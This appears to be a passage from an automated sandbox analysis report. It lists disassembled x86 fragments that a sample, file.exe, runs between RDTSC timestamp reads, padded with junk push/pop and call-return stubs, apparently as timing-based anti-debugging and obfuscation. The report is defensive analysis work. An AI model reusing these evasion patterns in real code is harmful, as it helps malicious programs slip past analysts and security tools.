              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF4F6 second address: 5DF571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F02B8F275E8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 movsx esi, cx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F02B8F275E8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 movsx esi, cx 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push ebp 0x0000004a call 00007F02B8F275E8h 0x0000004f pop ebp 0x00000050 mov dword ptr [esp+04h], ebp 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc ebp 0x0000005d push ebp 0x0000005e ret 0x0000005f pop ebp 0x00000060 ret 0x00000061 sub esi, dword ptr [ebp+122D391Fh] 0x00000067 xchg eax, ebx 0x00000068 push edx 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFF11 second address: 5DFF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jg 00007F02B8F2D486h 0x0000000f pop edi 0x00000010 jnc 00007F02B8F2D48Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1CB9 second address: 5E1CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1CBD second address: 5E1CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3210 second address: 5E3215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2FC3 second address: 5E2FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3215 second address: 5E321B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2FC8 second address: 5E2FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D499h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E321B second address: 5E3258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c and esi, 46E1C683h 0x00000012 push 00000000h 0x00000014 sub dword ptr [ebp+122D2BC1h], ebx 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+12460930h], edi 0x00000022 sub di, F6E3h 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F02B8F275EDh 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3258 second address: 5E326E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F02B8F2D48Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7BDB second address: 5E7BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8130 second address: 5E81AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push esi 0x00000006 jo 00007F02B8F2D488h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F02B8F2D488h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov ebx, ecx 0x0000002c push 00000000h 0x0000002e jmp 00007F02B8F2D495h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F02B8F2D488h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F02B8F2D491h 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E81AD second address: 5E81B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F63 second address: 5E8F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F69 second address: 5E8F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F6D second address: 5E8F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F02B8F2D486h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8F7F second address: 5E8FC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F275EDh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F02B8F275E8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 movzx edi, dx 0x0000002c push 00000000h 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 push esi 0x00000033 pop esi 0x00000034 pop esi 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E911B second address: 5E9128 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F02B8F2D486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EAFF9 second address: 5EAFFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2D6 second address: 5EA2DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9242 second address: 5E9254 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F02B8F275E6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2DC second address: 5EA2F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F02B8F2D486h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F02B8F2D498h 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F02B8F2D486h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA2F7 second address: 5EA2FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED175 second address: 5ED190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D497h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED190 second address: 5ED1E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bh, al 0x0000000d push 00000000h 0x0000000f pushad 0x00000010 push esi 0x00000011 mov dword ptr [ebp+122D2747h], ebx 0x00000017 pop eax 0x00000018 popad 0x00000019 jc 00007F02B8F275ECh 0x0000001f mov dword ptr [ebp+1247C90Bh], eax 0x00000025 push 00000000h 0x00000027 jmp 00007F02B8F275F0h 0x0000002c mov ebx, dword ptr [ebp+122D3843h] 0x00000032 xchg eax, esi 0x00000033 jmp 00007F02B8F275EDh 0x00000038 push eax 0x00000039 pushad 0x0000003a push edi 0x0000003b push esi 0x0000003c pop esi 0x0000003d pop edi 0x0000003e pushad 0x0000003f push esi 0x00000040 pop esi 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF25B second address: 5EF27A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F02B8F2D494h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF27A second address: 5EF2EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F02B8F275E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F02B8F275E8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 movsx edi, si 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+12453D89h], edx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F02B8F275E8h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 mov di, 0601h 0x00000054 mov dword ptr [ebp+1248396Dh], ebx 0x0000005a push eax 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f pop ebx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF2EE second address: 5EF2F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F024C second address: 5F02B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F02B8F275E8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 jne 00007F02B8F275F4h 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+1244ED24h] 0x00000030 push 00000000h 0x00000032 call 00007F02B8F275EBh 0x00000037 mov ebx, dword ptr [ebp+122D3863h] 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jne 00007F02B8F275ECh 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F02B8 second address: 5F02BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F22F4 second address: 5F2382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F275F0h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F02B8F275EFh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F02B8F275E8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D3867h] 0x00000031 push 00000000h 0x00000033 sbb bx, B4B0h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F02B8F275E8h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D2C9Bh], edx 0x0000005a mov edi, 29725402h 0x0000005f mov dword ptr [ebp+122D2704h], eax 0x00000065 xchg eax, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 jnc 00007F02B8F275E8h 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F558C second address: 5F55B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F02B8F2D488h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F02B8F2D499h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F55B7 second address: 5F55BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F149A second address: 5F1580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F02B8F2D488h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2307h], eax 0x0000002c call 00007F02B8F2D48Dh 0x00000031 or di, FE43h 0x00000036 pop ebx 0x00000037 push dword ptr fs:[00000000h] 0x0000003e jp 00007F02B8F2D48Ch 0x00000044 mov edi, 410CE05Ch 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 mov bl, 54h 0x00000052 mov eax, dword ptr [ebp+122D0D29h] 0x00000058 push 00000000h 0x0000005a push ebp 0x0000005b call 00007F02B8F2D488h 0x00000060 pop ebp 0x00000061 mov dword ptr [esp+04h], ebp 0x00000065 add dword ptr [esp+04h], 00000019h 0x0000006d inc ebp 0x0000006e push ebp 0x0000006f ret 0x00000070 pop ebp 0x00000071 ret 0x00000072 mov ebx, dword ptr [ebp+122D39B3h] 0x00000078 sub dword ptr [ebp+1247DC7Ch], ebx 0x0000007e push FFFFFFFFh 0x00000080 mov ebx, 10A97371h 0x00000085 nop 0x00000086 pushad 0x00000087 push edx 0x00000088 jmp 00007F02B8F2D497h 0x0000008d pop edx 0x0000008e push eax 0x0000008f push edx 0x00000090 jmp 00007F02B8F2D495h 0x00000095 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1580 second address: 5F158D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F158D second address: 5F1596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F64A9 second address: 5F64BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F02B8F275E6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5767 second address: 5F576B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F576B second address: 5F5777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FAA73 second address: 5FAA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F02B8F2D486h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FAA7D second address: 5FAA94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007F02B8F2760Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jg 00007F02B8F275E6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FAA94 second address: 5FAA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FEDCA second address: 5FEDFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F275F4h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F02B8F275F7h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60200A second address: 602010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602010 second address: 602016 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606BAD second address: 606BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606BB1 second address: 606BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F02B8F275E8h 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007F02B8F275F7h 0x00000016 pop edi 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606C66 second address: 606C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D2F7 second address: 60D317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02B8F275ECh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F02B8F275FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D317 second address: 60D334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D492h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D334 second address: 60D339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CB3F second address: 60CB5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D495h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CB5F second address: 60CB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CB67 second address: 60CB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CB6C second address: 60CB98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F02B8F275F6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CB98 second address: 60CB9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CB9C second address: 60CBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D106 second address: 60D10A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D10A second address: 60D110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D110 second address: 60D12F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D499h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D12F second address: 60D133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D133 second address: 60D142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D142 second address: 60D147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B520 second address: 67B570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F02B8F2D490h 0x00000013 push eax 0x00000014 jmp 00007F02B8F2D48Ch 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c push ecx 0x0000001d jmp 00007F02B8F2D498h 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 jg 00007F02B8F2D486h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684ECA second address: 684ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684ECE second address: 684ED4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684ED4 second address: 684EDE instructions: 0x00000000 rdtsc 0x00000002 je 00007F02B8F275F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684EDE second address: 684EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683712 second address: 68371C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F02B8F275E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68386C second address: 683873 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683873 second address: 683887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683887 second address: 6838A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F02B8F2D494h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6838A0 second address: 6838BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F02B8F275E6h 0x00000009 jmp 00007F02B8F275EFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
